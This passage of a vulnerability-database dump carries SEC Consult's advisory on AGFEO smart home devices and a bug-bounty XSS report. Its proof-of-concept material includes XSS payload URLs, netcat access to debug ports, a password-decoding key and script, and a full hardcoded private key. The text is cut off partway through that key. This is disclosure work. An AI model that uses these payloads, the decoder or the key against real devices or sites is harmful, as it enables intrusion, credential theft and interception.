For example the connection to port 19081:\r\n```\r\n$ nc 192.168.0.40 19081\r\nStart Menue: <Return>\r\n========< UPDS - Menue >========\r\ns: show state\r\nh: help\r\nD: DEBmod on\r\nd: DEBmod off\r\nL: LOG on\r\nl: LOG off\r\nS: SERVICE-SUBMENUE\r\nq: Quit telnet session\r\n========= NOT AKTIV ===========\r\ns\r\nstatus ausgeben (noch nicht vollstaendig implementiert)\r\nupds <Timestamp> bState: 00\r\nupds <Timestamp> bLastReceiveBlockNum: 15\r\n[...]\r\nS\r\nupds <Timestamp>\r\nupds <Timestamp> ===== service-menue ======================\r\nupds <Timestamp> help help\r\nupds <Timestamp> q quit\r\nupds <Timestamp> D dial\r\nupds <Timestamp> d disconnect\r\nupds <Timestamp> ============ NOT AKTIV ===================\r\nservice submenue\r\n```\r\n\r\n3) Hardcoded cryptographic keys\r\n\r\nRefer to our study on hardcoded cryptographic secrets in embedded systems for further information.\r\n```\r\nhttp://blog.sec-consult.com/2016/09/house-of-keys-9-months-later-40-worse.html\r\n```\r\nIoT Inspector (http://www.iot-inspector.com/) was used to identify this vulnerability.\r\n```\r\nOpenSSL output for the certificate:\r\nCertificate:\r\n Data:\r\n Version: 1 (0x0)\r\n Serial Number: 10293758115057549292 (0x8edac6778bccbfec)\r\n Signature Algorithm: sha256WithRSAEncryption\r\n Issuer: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev,\r\nCN=info/emailAddress=info () agfeo de\r\n Validity\r\n Not Before: Oct 21 14:03:55 2014 GMT\r\n Not After : Mar 8 14:03:55 2042 GMT\r\n Subject: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. 
KG, OU=Dev,\r\nCN=info/emailAddress=info () agfeo de\r\n Subject Public Key Info:\r\n Public Key Algorithm: rsaEncryption\r\n Public-Key: (2048 bit)\r\n Modulus:\r\n 00:be:79:ad:17:e8:c7:9e:63:b3:bb:67:ce:bd:79:\r\n 29:66:22:ce:63:99:6a:a5:31:f4:70:5f:3f:9d:11:\r\n 94:d6:65:8c:4e:43:6b:e4:d4:f1:f4:bd:81:4c:72:\r\n 67:50:10:09:b8:60:b3:cd:be:23:ce:9a:75:ec:e4:\r\n 7a:cf:3a:e2:f0:51:f9:a5:f3:c5:67:5d:01:e9:72:\r\n 68:b1:59:f5:5b:d8:dc:3e:1d:00:df:06:a6:07:06:\r\n 12:70:c7:97:05:a5:da:80:14:2c:c7:ae:6a:ef:a1:\r\n 1a:b8:f8:6b:71:5e:91:04:da:43:ba:cf:7c:ef:bd:\r\n 01:b7:15:a1:7b:8f:52:21:06:ad:48:b4:57:0c:b2:\r\n ac:b2:14:fe:30:38:96:5e:28:b8:68:b2:d3:ee:8d:\r\n 28:3c:ac:a0:95:c8:07:39:b7:df:95:6d:88:a2:12:\r\n 77:31:a8:55:f6:ab:c7:17:16:03:5f:ca:f2:ca:8f:\r\n fd:37:65:2c:b0:aa:47:59:fe:d6:ec:69:8f:db:b6:\r\n 9e:93:4b:f0:87:77:90:f6:5c:e4:64:d1:96:99:d5:\r\n d8:37:e4:7d:2f:bd:f4:04:fd:67:13:bc:68:ea:e6:\r\n 00:dd:72:74:a2:fe:1a:00:27:8b:b8:96:a6:0c:93:\r\n 82:52:6d:61:2c:62:02:b2:e8:ab:45:e4:87:98:d2:\r\n ba:57\r\n Exponent: 65537 (0x10001)\r\n Signature Algorithm: sha256WithRSAEncryption\r\n 37:12:cb:94:9a:51:f8:9a:04:9f:60:19:6a:12:23:38:10:85:\r\n b5:79:2b:49:5d:b6:65:82:76:c0:0b:20:d1:bf:04:ce:46:38:\r\n 56:ea:0b:2e:41:f5:61:d1:12:d4:ce:34:d9:e3:2a:bb:e8:9f:\r\n f1:0e:0d:da:37:91:ee:92:dd:9a:85:91:14:a2:21:87:da:52:\r\n 33:d6:ec:74:c0:3a:46:7f:82:02:91:75:99:ad:fd:72:1b:ec:\r\n 00:64:10:e1:9c:81:3b:c9:8e:6b:73:d5:e1:df:7b:60:d4:b6:\r\n 08:51:30:25:b1:a0:ed:f0:de:2e:15:33:c2:bf:c3:fe:69:1b:\r\n a8:26:c3:25:f0:53:8e:1f:8a:aa:44:f4:59:88:5b:7d:27:d6:\r\n a5:a9:e8:26:a9:ba:75:f0:84:5d:e0:e7:03:75:a0:a6:64:c4:\r\n 16:ce:88:16:ca:72:f2:43:7a:08:b5:e3:48:d7:c3:a1:3a:28:\r\n 43:3c:5a:30:d4:31:dc:68:a5:5c:da:7c:20:7b:ee:e6:a2:04:\r\n a3:3e:f1:5d:39:f4:89:d7:f0:f3:b4:e6:5e:81:cd:60:34:61:\r\n ef:e1:d8:59:f9:d0:5a:11:af:53:03:93:4a:9e:fb:1e:a3:8b:\r\n 94:90:de:59:91:59:ff:f3:1b:5a:ef:7f:aa:33:c2:47:50:05:\r\n 0a:bc:62:3c\r\n\r\nCertificate:\r\n-----BEGIN 
CERTIFICATE-----\r\nMIIDnDCCAoQCCQCO2sZ3i8y/7DANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMC\r\nREUxEzARBgNVBAgMClNvbWUtU3RhdGUxEjAQBgNVBAcMCUJpZWxlZmVsZDEcMBoG\r\nA1UECgwTQUdGRU8gR21iSCAmIENvLiBLRzEMMAoGA1UECwwDRGV2MQ0wCwYDVQQD\r\nDARpbmZvMRwwGgYJKoZIhvcNAQkBFg1pbmZvQGFnZmVvLmRlMB4XDTE0MTAyMTE0\r\nMDM1NVoXDTQyMDMwODE0MDM1NVowgY8xCzAJBgNVBAYTAkRFMRMwEQYDVQQIDApT\r\nb21lLVN0YXRlMRIwEAYDVQQHDAlCaWVsZWZlbGQxHDAaBgNVBAoME0FHRkVPIEdt\r\nYkggJiBDby4gS0cxDDAKBgNVBAsMA0RldjENMAsGA1UEAwwEaW5mbzEcMBoGCSqG\r\nSIb3DQEJARYNaW5mb0BhZ2Zlby5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC\r\nAQoCggEBAL55rRfox55js7tnzr15KWYizmOZaqUx9HBfP50RlNZljE5Da+TU8fS9\r\ngUxyZ1AQCbhgs82+I86adezkes864vBR+aXzxWddAelyaLFZ9VvY3D4dAN8GpgcG\r\nEnDHlwWl2oAULMeuau+hGrj4a3FekQTaQ7rPfO+9AbcVoXuPUiEGrUi0VwyyrLIU\r\n/jA4ll4ouGiy0+6NKDysoJXIBzm335VtiKISdzGoVfarxxcWA1/K8sqP/TdlLLCq\r\nR1n+1uxpj9u2npNL8Id3kPZc5GTRlpnV2DfkfS+99AT9ZxO8aOrmAN1ydKL+GgAn\r\ni7iWpgyTglJtYSxiArLoq0Xkh5jSulcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEA\r\nNxLLlJpR+JoEn2AZahIjOBCFtXkrSV22ZYJ2wAsg0b8EzkY4VuoLLkH1YdES1M40\r\n2eMqu+if8Q4N2jeR7pLdmoWRFKIhh9pSM9bsdMA6Rn+CApF1ma39chvsAGQQ4ZyB\r\nO8mOa3PV4d97YNS2CFEwJbGg7fDeLhUzwr/D/mkbqCbDJfBTjh+KqkT0WYhbfSfW\r\npanoJqm6dfCEXeDnA3WgpmTEFs6IFspy8kN6CLXjSNfDoTooQzxaMNQx3GilXNp8\r\nIHvu5qIEoz7xXTn0idfw87TmXoHNYDRh7+HYWfnQWhGvUwOTSp77HqOLlJDeWZFZ\r\n//MbWu9/qjPCR1AFCrxiPA==\r\n-----END CERTIFICATE-----\r\n\r\nPrivate Key:\r\n-----BEGIN PRIVATE 
KEY-----\r\nMIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQC+ea0X6MeeY7O7\r\nZ869eSlmIs5jmWqlMfRwXz+dEZTWZYxOQ2vk1PH0vYFMcmdQEAm4YLPNviPOmnXs\r\n5HrPOuLwUfml88VnXQHpcmixWfVb2Nw+HQDfBqYHBhJwx5cFpdqAFCzHrmrvoRq4\r\n+GtxXpEE2kO6z3zvvQG3FaF7j1IhBq1ItFcMsqyyFP4wOJZeKLhostPujSg8rKCV\r\nyAc5t9+VbYiiEncxqFX2q8cXFgNfyvLKj/03ZSywqkdZ/tbsaY/btp6TS/CHd5D2\r\nXORk0ZaZ1dg35H0vvfQE/WcTvGjq5gDdcnSi/hoAJ4u4lqYMk4JSbWEsYgKy6KtF\r\n5IeY0rpXAgMBAAECggEAI7joKJrEjUT/mT8Pu+M0S25trKpCIPcsc8K5SHjapBbp\r\naGgmnQT+17qOvEqca5yGZijkr8pgJsg7I5F6ItFVbGLDYkdEl20PBbwqPFC1vmL+\r\nczu3RRyXGKwf2zzjavC++NRPzac9cPGS9GvKorlsky9oEmoFcWTOJIsO/QBVE9I8\r\nhPc5utxQQ5WTDfUD84Y2ELJx/qhZNB8gOF+KhDQT0slE1/7Y7sHMi++kxVj+KiVb\r\nKif3DxpB6reMP5s1zhmfJcF9pPrr6jT35OuEjQ15y9p9wrLL1txfJbi3O6Ucwd3q\r\nINHugNN/v+/6ia06aZtknxYoG+hFS7PbulU11VSimQKBgQDzoQRtO0MjEo3Gucqi\r\niaxpueYsAizJx9GkdCh7StN8ZWADpZj6x7B6vIhjXZO6Q5bM6j838lYWyNYsBHpq\r\nFXeAM8cPIm7xUpRQDLKfhU9YA9/6iQ8/dzTYR49uj67syc9HH9dIOsRyVAy2ci6S\r\nUySE3aTSCJCwSerpFZWoPqsbOwKBgQDIJbQQg+QnAOdTYdmIQv8zW6nLvuwLzNkP\r\nwxFlZ/78DI8+2h1H5LGd/2C2ybKIsif/pU5u721qkqxIrIc1I3BWcX+O+QwiJ1oO\r\nSBeA3gzcD7IOpW2GqyN8tt8cWo48moDjIcSYGB6mSd0WmX7MfsOxnEybLWQIKHD4\r\nsTclSDuTlQKBgQDZyRGk97oPazGT+Vf8LmgS5xysMJGLG3X7td7OQFiHtjO7btgv\r\nLj1Dqq+da/R4KJ1wtuImiBqPKZ/TH3myxVfbIe4LSHO2hGSSnpc65LfF7UjWtJkN\r\n2elCgc3lPspXYBxL71nKdsZPkXT/z1h0c6CMqXoCS6fT/2/gRuxOxx68KwKBgQCo\r\nSEM465wmSzU0v34GesZWKUj/nXycg1UyUoJK8ADNbcX3Q68A5sGMpc9sgPQSyTCm\r\nWxgyYC9wPviKdj2MqUpn9DAbRz0zbkDi5yyT1p+bW7sLY35Oj5Bb6Op4zY7wV7vs\r\nvVStyQHkMRCqUs7xI9hoepFSm/ySe2ZZQ6+pMi2dbQKBgQCn9FdGZzWOAIXrfj7Q\r\nSoMEUPEIEdxXYEy8Rudh9VVIJQW4tvYX6mQMr8fgx5RKRaTsL1Qv/tn9XGq00wes\r\n3NuLEq2urJAC7z8smqkvWm2xo91j+ExeRL66CfPdm5KPyaCXcuFysz5/LUKxG/a3\r\n+K62TQB1mEb1t9WQsxJYGcUiyg==\r\n-----END PRIVATE KEY-----\r\n```\r\n\r\n4) Multiple reflected cross site scripting (XSS) vulnerabilities\r\n\r\nThe following crafted requests can be used to trigger the cross site scripting vulnerability at different entry 
points:\r\n```\r\nhttp://<Device-IP>:20011/ais.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>:20011/xtopbxwav.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>:20011/update.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>/pbxapi/licence.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/eoimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/knximport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/hmimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\n```\r\n\r\n### Vulnerable / tested versions:\r\n\r\nOne firmware is available for the whole ES 5 product line, and another one for the product line ES 6. Therefore, all vulnerabilities which have been found in one product of ES 5/6 are also available in all other products of ES 5/6.\r\n\r\nThe following product / firmware version has been tested by SEC Consult:\r\n* ES 512 Version 1.9b (es5xxv19b_c063be6)\r\n* ES 512 Version 1.10 (es5xxv110_f105485)\r\n\r\nBased on results of the SEC Technologies IoT Inspector (http://www.iot-inspector.com/ - automated firmware analysis tool) we believe that the product line ES 6 is also prone to the identified vulnerabilities (except the web service on port 20011) as well as product line ES 5.\r\n\r\n* Firmware Version 1.9b (ES6xxv19b_c063be67b9c2ba)\r\n* Firmware Version 1.10 (ES6xxv110_f105485715a360)", "published": "2018-04-28T00:00:00", "type": "seebug", "title": "Multiple critical vulnerabilities in AGFEO smart home ES 5xx/6xx products", "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-04-28T00:00:00", "id": "SSV:97254", "href": "https://www.seebug.org/vuldb/ssvid-97254", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "openbugbounty": [{"lastseen": "2018-03-15T01:09:38", "bulletinFamily": "bugbounty", "cvelist": [], "description": "##### Open Bug Bounty ID: 
OBB-372548\n\nDescription| Value \n---|--- \nAffected Website:| aplusa-online.com \nVulnerable Application:| Custom Code \nVulnerability Type:| XSS (Cross Site Scripting) / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nRemediation Guide:| OWASP XSS Prevention Cheat Sheet \n \n##### Vulnerable URL:\n \n \n https://www.aplusa-online.com/vis/v1/en/search?oid=19004\u2329=2&_query=%27-alert(5)-%27\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 27 October, 2017 11:19 GMT \nVulnerability Verified:| 27 October, 2017 11:22 GMT \nWebsite Operator Notified:| 27 October, 2017 11:22 GMT \nVulnerability Published:| 27 October, 2017 11:22 GMT[without any technical details] \nPublic Disclosure:| 25 January, 2018 11:19 GMT\n", "modified": "2018-01-25T11:19:00", "published": "2017-10-27T11:19:00", "id": "OBB:372548", "href": "https://www.openbugbounty.org/reports/372548/", "type": "openbugbounty", "title": "aplusa-online.com XSS vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-03-20T05:17:14", "description": "AGFEO Smart Home ES 5xx / 6xx versions 1.9b and 1.10 suffers from authentication bypass, cross site scripting, and hard-coded private key vulnerabilities.", "edition": 1, "published": "2017-07-13T00:00:00", "title": "AGFEO Smart Home ES 5xx / 6xx Authentication Bypass / XSS / Hardcoded Credentials Vulnerabilities", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-07-13T00:00:00", "href": "https://0day.today/exploit/description/28123", "id": "1337DAY-ID-28123", "sourceData": "title: Multiple critical vulnerabilities\r\n product: AGFEO Smart Home ES 5xx\r\n AGFEO Smart Home ES 6xx\r\n vulnerable version: at least 1.9b, 1.10\r\n fixed version: 1.12c\r\n CVE number: -\r\n impact: Critical\r\n homepage: https://www.agfeo.de/\r\n found: 2016-12-28\r\n by: T. 
Weber (Office Vienna)\r\n SEC Consult Vulnerability Lab\r\n\r\n An integrated part of SEC Consult\r\n Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow\r\n Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich\r\n\r\n https://www.sec-consult.com\r\n\r\n=======================================================================\r\n\r\nVendor description:\r\n-------------------\r\nAGFEO GmbH & Co. KG is a vendor of telephone systems and other\r\n(tele-)communication products like DECT phones, headsets or smart home\r\nproducts as well.\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nThe available patches should be installed immediately.\r\n\r\nSEC Consult recommends not to use this product in a production environment\r\nuntil a thorough security review has been performed by security professionals\r\nas there are indications for further security issues.\r\n\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Unauthenticated access to web services and authentication bypass\r\nA web service with multiple scripts for debug purposes is accessible\r\non an unusual port on the device. There is also a script to read files from\r\nthe filesystem. As the web service runs with root privileges all files\r\non the operating system can be read by an attacker. This only affects the\r\nES 5xx product line, all other vulnerabilities affect both ES 5xx and 6xx.\r\n\r\nThe configuration of the device can be changed and arbitrary updates can be\r\nuploaded as well as music files for the answering machine. By reading the\r\ndatabase content, the usernames and their passwords can be revealed and easily\r\ndecrypted. This way the administrator password can be dumped from the database\r\nand the device can be fully administrated by an attacker.\r\nThe normal user interface has an additional development subfolder which was\r\nprobably used during the development process. 
Updates can be triggered from\r\nthis sub platform and log files, statistics and states can also be displayed.\r\n\r\n\r\n2) Unauthenticated access to configuration ports\r\nMultiple different instances of TCP services are present on the device. Each\r\nof the listening sockets is forked from a debug and configuration service.\r\nInternal device information can be read from the device. Among other commands,\r\nthe configuration of the device can also be altered by using these services.\r\n\r\n\r\n3) Hardcoded cryptographic keys\r\nThree certificates including their private keys are embedded in the firmware\r\nof AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both\r\nproduct lines are exactly the same. One certificate is used for HTTPS\r\n(default server certificate for web based configuration and management).\r\n\r\nImpersonation, man-in-the-middle or passive decryption attacks are possible.\r\nThese attacks allow an attacker to gain access to sensitive information like\r\nadmin credentials and use them in further attacks.\r\n\r\n\r\n4) Multiple reflected cross site scripting (XSS) vulnerabilities\r\nThe ES 5xx SmartHome products are vulnerable to reflected cross site scripting.\r\nMalicious JavaScript code can be executed in the browser of a victim by luring\r\nto a handcrafted link. 
This is possible even if the victim is not logged in.\r\nIt is assumed that the 6xx products are affected as well but those could not be\r\ntested.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Unauthenticated access to web services and authentication bypass\r\nThe debug web service is available by using the following url:\r\nhttp://<Device-IP>:20011/index.html\r\nThere are different scripts accessible, the following actions can be executed:\r\n -) Change IP configuration\r\n -) Change time zone\r\n -) Upload updates (Any files can be uploaded to the device!)\r\n -) Read all files on the filesystem\r\n -) Play, delete and move voice messages on all mail boxes\r\n -) Converting mp3 files to wav files\r\n -) List all connected phones and the related numbers\r\n\r\nThe SQLite database is located under \"/home/profile/poolstore.db\". By reading\r\nthis file the usernames and passwords can be dumped. The passwords are encoded\r\nwith base64 and encrypted with XOR. To decrypt the XOR'ed password the\r\nfollowing key has to be used:\r\n \"0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba\"\r\n\r\nThe function to decrypt the password was found in the php script \"login.php\":\r\nfunction decodePassword($PasswordEnc)\r\n{\r\n $PasswordBinaryEncBase64 = \"\";\r\n $PasswordBinaryEnc=\"\";\r\n $PasswordBinary = array();\r\n $Password = \"\";\r\n $lastChar=0;\r\n\r\n $Key=array(0x42, 0xab, 0xce, 0xfa, 0x54, 0xed, 0xcf, 0xba);\r\n\r\n $PasswordBinaryEncBase64 = $PasswordEnc;\r\n\r\n // base64 decode\r\n $PasswordBinaryEnc = base64_decode($PasswordBinaryEncBase64);\r\n\r\n // xor decode\r\n for($i=0; $i<strlen($PasswordBinaryEnc); $i++) {\r\n $PasswordBinary[$i] = ord($PasswordBinaryEnc[$i]) ^ $Key[$i % count($Key)]\r\n^ $lastChar;\r\n $lastChar = ord($PasswordBinaryEnc[$i]);\r\n }\r\n\r\n // erstes Zeichen entfernen (random char!)\r\n foreach ($PasswordBinary as $chr) {\r\n $Password .= chr($chr);\r\n }\r\n $Password = substr($Password, 1);\r\n // printf(\"%s:%d Password 
%s\\n\", __FUNCTION__, __LINE__, $Password);\r\n return $Password;\r\n}\r\n\r\nAn additional subfolder, which contains debug scripts, is available under the\r\nfollowing location:\r\nhttp://<Device-IP>/shdev/ui9.php\r\n\r\nUpdates can be triggered, logs can be shown and status messages can be gathered\r\nwithin this functionality. Furthermore, it is possible to debug the login\r\nprocess. Since there is a hardcoded user \"admin\" a brute force attack is also\r\npossible.\r\n\r\n\r\n2) Unauthenticated access to configuration ports\r\nThe following TCP ports can be accessed with \"nc <Device-IP> -p <Port>\":\r\n19002, 19004, 19006, 19009, 19010, 19080, 19081\r\nBy connecting to one of these ports a debug interface spawns. For example the\r\nconnection to port 19081:\r\n$ nc 192.168.0.40 19081\r\nStart Menue: <Return>\r\n========< UPDS - Menue >========\r\ns: show state\r\nh: help\r\nD: DEBmod on\r\nd: DEBmod off\r\nL: LOG on\r\nl: LOG off\r\nS: SERVICE-SUBMENUE\r\nq: Quit telnet session\r\n========= NOT AKTIV ===========\r\ns\r\nstatus ausgeben (noch nicht vollstaendig implementiert)\r\nupds <Timestamp> bState: 00\r\nupds <Timestamp> bLastReceiveBlockNum: 15\r\n[...]\r\nS\r\nupds <Timestamp>\r\nupds <Timestamp> ===== service-menue ======================\r\nupds <Timestamp> help help\r\nupds <Timestamp> q quit\r\nupds <Timestamp> D dial\r\nupds <Timestamp> d disconnect\r\nupds <Timestamp> ============ NOT AKTIV ===================\r\nservice submenue\r\n\r\n\r\n3) Hardcoded cryptographic keys\r\nRefer to our study on hardcoded cryptographic secrets in embedded systems for\r\nfurther information.\r\nhttp://blog.sec-consult.com/2016/09/house-of-keys-9-months-later-40-worse.html\r\nIoT Inspector (http://www.iot-inspector.com/) was used to identify this\r\nvulnerability.\r\n\r\nOpenSSL output for the certificate:\r\nCertificate:\r\n Data:\r\n Version: 1 (0x0)\r\n Serial Number: 10293758115057549292 (0x8edac6778bccbfec)\r\n Signature Algorithm: sha256WithRSAEncryption\r\n 
Issuer: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev,\r\nCN=info/emailAddress=info@agfeo.de\r\n Validity\r\n Not Before: Oct 21 14:03:55 2014 GMT\r\n Not After : Mar 8 14:03:55 2042 GMT\r\n Subject: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev,\r\nCN=info/emailAddress=info@agfeo.de\r\n Subject Public Key Info:\r\n Public Key Algorithm: rsaEncryption\r\n Public-Key: (2048 bit)\r\n Modulus:\r\n 00:be:79:ad:17:e8:c7:9e:63:b3:bb:67:ce:bd:79:\r\n 29:66:22:ce:63:99:6a:a5:31:f4:70:5f:3f:9d:11:\r\n 94:d6:65:8c:4e:43:6b:e4:d4:f1:f4:bd:81:4c:72:\r\n 67:50:10:09:b8:60:b3:cd:be:23:ce:9a:75:ec:e4:\r\n 7a:cf:3a:e2:f0:51:f9:a5:f3:c5:67:5d:01:e9:72:\r\n 68:b1:59:f5:5b:d8:dc:3e:1d:00:df:06:a6:07:06:\r\n 12:70:c7:97:05:a5:da:80:14:2c:c7:ae:6a:ef:a1:\r\n 1a:b8:f8:6b:71:5e:91:04:da:43:ba:cf:7c:ef:bd:\r\n 01:b7:15:a1:7b:8f:52:21:06:ad:48:b4:57:0c:b2:\r\n ac:b2:14:fe:30:38:96:5e:28:b8:68:b2:d3:ee:8d:\r\n 28:3c:ac:a0:95:c8:07:39:b7:df:95:6d:88:a2:12:\r\n 77:31:a8:55:f6:ab:c7:17:16:03:5f:ca:f2:ca:8f:\r\n fd:37:65:2c:b0:aa:47:59:fe:d6:ec:69:8f:db:b6:\r\n 9e:93:4b:f0:87:77:90:f6:5c:e4:64:d1:96:99:d5:\r\n d8:37:e4:7d:2f:bd:f4:04:fd:67:13:bc:68:ea:e6:\r\n 00:dd:72:74:a2:fe:1a:00:27:8b:b8:96:a6:0c:93:\r\n 82:52:6d:61:2c:62:02:b2:e8:ab:45:e4:87:98:d2:\r\n ba:57\r\n Exponent: 65537 (0x10001)\r\n Signature Algorithm: sha256WithRSAEncryption\r\n 37:12:cb:94:9a:51:f8:9a:04:9f:60:19:6a:12:23:38:10:85:\r\n b5:79:2b:49:5d:b6:65:82:76:c0:0b:20:d1:bf:04:ce:46:38:\r\n 56:ea:0b:2e:41:f5:61:d1:12:d4:ce:34:d9:e3:2a:bb:e8:9f:\r\n f1:0e:0d:da:37:91:ee:92:dd:9a:85:91:14:a2:21:87:da:52:\r\n 33:d6:ec:74:c0:3a:46:7f:82:02:91:75:99:ad:fd:72:1b:ec:\r\n 00:64:10:e1:9c:81:3b:c9:8e:6b:73:d5:e1:df:7b:60:d4:b6:\r\n 08:51:30:25:b1:a0:ed:f0:de:2e:15:33:c2:bf:c3:fe:69:1b:\r\n a8:26:c3:25:f0:53:8e:1f:8a:aa:44:f4:59:88:5b:7d:27:d6:\r\n a5:a9:e8:26:a9:ba:75:f0:84:5d:e0:e7:03:75:a0:a6:64:c4:\r\n 16:ce:88:16:ca:72:f2:43:7a:08:b5:e3:48:d7:c3:a1:3a:28:\r\n 
43:3c:5a:30:d4:31:dc:68:a5:5c:da:7c:20:7b:ee:e6:a2:04:\r\n a3:3e:f1:5d:39:f4:89:d7:f0:f3:b4:e6:5e:81:cd:60:34:61:\r\n ef:e1:d8:59:f9:d0:5a:11:af:53:03:93:4a:9e:fb:1e:a3:8b:\r\n 94:90:de:59:91:59:ff:f3:1b:5a:ef:7f:aa:33:c2:47:50:05:\r\n 0a:bc:62:3c\r\n\r\nCertificate:\r\n-----BEGIN CERTIFICATE-----\r\nMIIDnDCCAoQCCQCO2sZ3i8y/7DANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMC\r\nREUxEzARBgNVBAgMClNvbWUtU3RhdGUxEjAQBgNVBAcMCUJpZWxlZmVsZDEcMBoG\r\nA1UECgwTQUdGRU8gR21iSCAmIENvLiBLRzEMMAoGA1UECwwDRGV2MQ0wCwYDVQQD\r\nDARpbmZvMRwwGgYJKoZIhvcNAQkBFg1pbmZvQGFnZmVvLmRlMB4XDTE0MTAyMTE0\r\nMDM1NVoXDTQyMDMwODE0MDM1NVowgY8xCzAJBgNVBAYTAkRFMRMwEQYDVQQIDApT\r\nb21lLVN0YXRlMRIwEAYDVQQHDAlCaWVsZWZlbGQxHDAaBgNVBAoME0FHRkVPIEdt\r\nYkggJiBDby4gS0cxDDAKBgNVBAsMA0RldjENMAsGA1UEAwwEaW5mbzEcMBoGCSqG\r\nSIb3DQEJARYNaW5mb0BhZ2Zlby5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC\r\nAQoCggEBAL55rRfox55js7tnzr15KWYizmOZaqUx9HBfP50RlNZljE5Da+TU8fS9\r\ngUxyZ1AQCbhgs82+I86adezkes864vBR+aXzxWddAelyaLFZ9VvY3D4dAN8GpgcG\r\nEnDHlwWl2oAULMeuau+hGrj4a3FekQTaQ7rPfO+9AbcVoXuPUiEGrUi0VwyyrLIU\r\n/jA4ll4ouGiy0+6NKDysoJXIBzm335VtiKISdzGoVfarxxcWA1/K8sqP/TdlLLCq\r\nR1n+1uxpj9u2npNL8Id3kPZc5GTRlpnV2DfkfS+99AT9ZxO8aOrmAN1ydKL+GgAn\r\ni7iWpgyTglJtYSxiArLoq0Xkh5jSulcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEA\r\nNxLLlJpR+JoEn2AZahIjOBCFtXkrSV22ZYJ2wAsg0b8EzkY4VuoLLkH1YdES1M40\r\n2eMqu+if8Q4N2jeR7pLdmoWRFKIhh9pSM9bsdMA6Rn+CApF1ma39chvsAGQQ4ZyB\r\nO8mOa3PV4d97YNS2CFEwJbGg7fDeLhUzwr/D/mkbqCbDJfBTjh+KqkT0WYhbfSfW\r\npanoJqm6dfCEXeDnA3WgpmTEFs6IFspy8kN6CLXjSNfDoTooQzxaMNQx3GilXNp8\r\nIHvu5qIEoz7xXTn0idfw87TmXoHNYDRh7+HYWfnQWhGvUwOTSp77HqOLlJDeWZFZ\r\n//MbWu9/qjPCR1AFCrxiPA==\r\n-----END CERTIFICATE-----\r\n\r\nPrivate Key:\r\n-----BEGIN PRIVATE 
KEY-----\r\nMIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQC+ea0X6MeeY7O7\r\nZ869eSlmIs5jmWqlMfRwXz+dEZTWZYxOQ2vk1PH0vYFMcmdQEAm4YLPNviPOmnXs\r\n5HrPOuLwUfml88VnXQHpcmixWfVb2Nw+HQDfBqYHBhJwx5cFpdqAFCzHrmrvoRq4\r\n+GtxXpEE2kO6z3zvvQG3FaF7j1IhBq1ItFcMsqyyFP4wOJZeKLhostPujSg8rKCV\r\nyAc5t9+VbYiiEncxqFX2q8cXFgNfyvLKj/03ZSywqkdZ/tbsaY/btp6TS/CHd5D2\r\nXORk0ZaZ1dg35H0vvfQE/WcTvGjq5gDdcnSi/hoAJ4u4lqYMk4JSbWEsYgKy6KtF\r\n5IeY0rpXAgMBAAECggEAI7joKJrEjUT/mT8Pu+M0S25trKpCIPcsc8K5SHjapBbp\r\naGgmnQT+17qOvEqca5yGZijkr8pgJsg7I5F6ItFVbGLDYkdEl20PBbwqPFC1vmL+\r\nczu3RRyXGKwf2zzjavC++NRPzac9cPGS9GvKorlsky9oEmoFcWTOJIsO/QBVE9I8\r\nhPc5utxQQ5WTDfUD84Y2ELJx/qhZNB8gOF+KhDQT0slE1/7Y7sHMi++kxVj+KiVb\r\nKif3DxpB6reMP5s1zhmfJcF9pPrr6jT35OuEjQ15y9p9wrLL1txfJbi3O6Ucwd3q\r\nINHugNN/v+/6ia06aZtknxYoG+hFS7PbulU11VSimQKBgQDzoQRtO0MjEo3Gucqi\r\niaxpueYsAizJx9GkdCh7StN8ZWADpZj6x7B6vIhjXZO6Q5bM6j838lYWyNYsBHpq\r\nFXeAM8cPIm7xUpRQDLKfhU9YA9/6iQ8/dzTYR49uj67syc9HH9dIOsRyVAy2ci6S\r\nUySE3aTSCJCwSerpFZWoPqsbOwKBgQDIJbQQg+QnAOdTYdmIQv8zW6nLvuwLzNkP\r\nwxFlZ/78DI8+2h1H5LGd/2C2ybKIsif/pU5u721qkqxIrIc1I3BWcX+O+QwiJ1oO\r\nSBeA3gzcD7IOpW2GqyN8tt8cWo48moDjIcSYGB6m